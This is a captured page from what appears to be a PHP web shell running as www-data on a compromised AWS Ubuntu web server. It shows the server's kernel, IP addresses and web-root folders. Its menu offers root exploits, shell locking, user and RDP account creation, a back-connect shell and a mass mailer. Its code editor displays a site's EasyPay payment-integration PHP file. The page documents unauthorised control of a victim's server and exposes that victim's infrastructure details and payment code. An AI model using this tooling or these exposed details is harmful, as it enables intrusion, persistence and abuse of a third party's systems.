Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.33.255
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gug /
PHP /
Sample_PhP_Code /
[ HOME SHELL ]
Name
Size
Permission
Action
AesForJava.php
4.82
KB
-rwxr-xr-x
EasyPay.php
2.53
KB
-rwxr-xr-x
sampleEasyPay.php
768
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EasyPay.php
<?php /** * while integration please use sendEasyPayRequest function along with parameters */ require_once 'AesForJava.php'; class EasyPay extends AesForJava { function __construct($POST_URL = '', $CHECKSUM_KEY = '', $ENCRYPTION_KEY = '') { if (empty($POST_URL) || empty($CHECKSUM_KEY) || empty($ENCRYPTION_KEY)) throw new Exception('POST_URL, CHECKSUM_KEY, ENCRYPTION_KEY params are missing', '001'); define('POST_URL', $POST_URL); define('CHECKSUM_KEY', $CHECKSUM_KEY); define('ENCRYPTION_KEY', $ENCRYPTION_KEY); } function sendEasyPayRequest($cid = '', $rid = '', $crn = '', $amt = '', $ver = '', $typ = '', $cny = '', $rtu = '', $ppi = '', $re1 = 'MN', $re2 = '', $re3 = '', $re4 = '', $re5 = '') { $i = $this->createEasypayRequest($cid, $rid, $crn, $amt, $ver, $typ, $cny, $rtu, $ppi, $re1 = 'MN', $re2, $re3, $re4, $re5); header('Location:' . POST_URL . "?i=" . $i); } function calcCheckSum($cid, $rid, $crn, $amt, $key) { $str = $cid . $rid . $crn . $amt . $key; return hash("sha256", $str); } function createEasypayRequest($cid = '', $rid = '', $crn = '', $amt = '', $ver = '', $typ = '', $cny = '', $rtu = '', $ppi = '', $re1 = 'MN', $re2 = '', $re3 = '', $re4 = '', $re5 = '') { $req_params = array('CID', 'RID', 'CRN', 'AMT', 'VER', 'TYP', 'CNY', 'RTU', 'PPI'); $postUrl = POST_URL; $checksumkey = CHECKSUM_KEY; /* ask easypay team for check-sum key */ $encryption_key = ENCRYPTION_KEY; /* ask easypay team for encryption key */ $arr = array( "CID" => $cid, "RID" => $rid, "CRN" => $crn, "AMT" => $amt, "VER" => $ver, "TYP" => $typ, "CNY" => $cny, "RTU" => $rtu, "PPI" => $ppi, "RE1" => $re1, "RE2" => $re2, "RE3" => $re3, "RE4" => $re4, "RE5" => $re5, ); foreach ($arr as $key => $value) { if (in_array($key, $req_params) && empty($value)) { $missing_params[] = $key; } } if (!empty($missing_params)) { echo "MISSING PARAMETERS ARE : " . implode(' , ', $missing_params); exit; } $arr['CKS'] = $this->calcCheckSum($cid, $rid, $crn, $amt, $checksumkey); $aesJava = new AesForJava(); $str = urldecode(http_build_query($arr)); $value_i = $aesJava->encrypt($str, $encryption_key, 128); return $value_i; } }
Close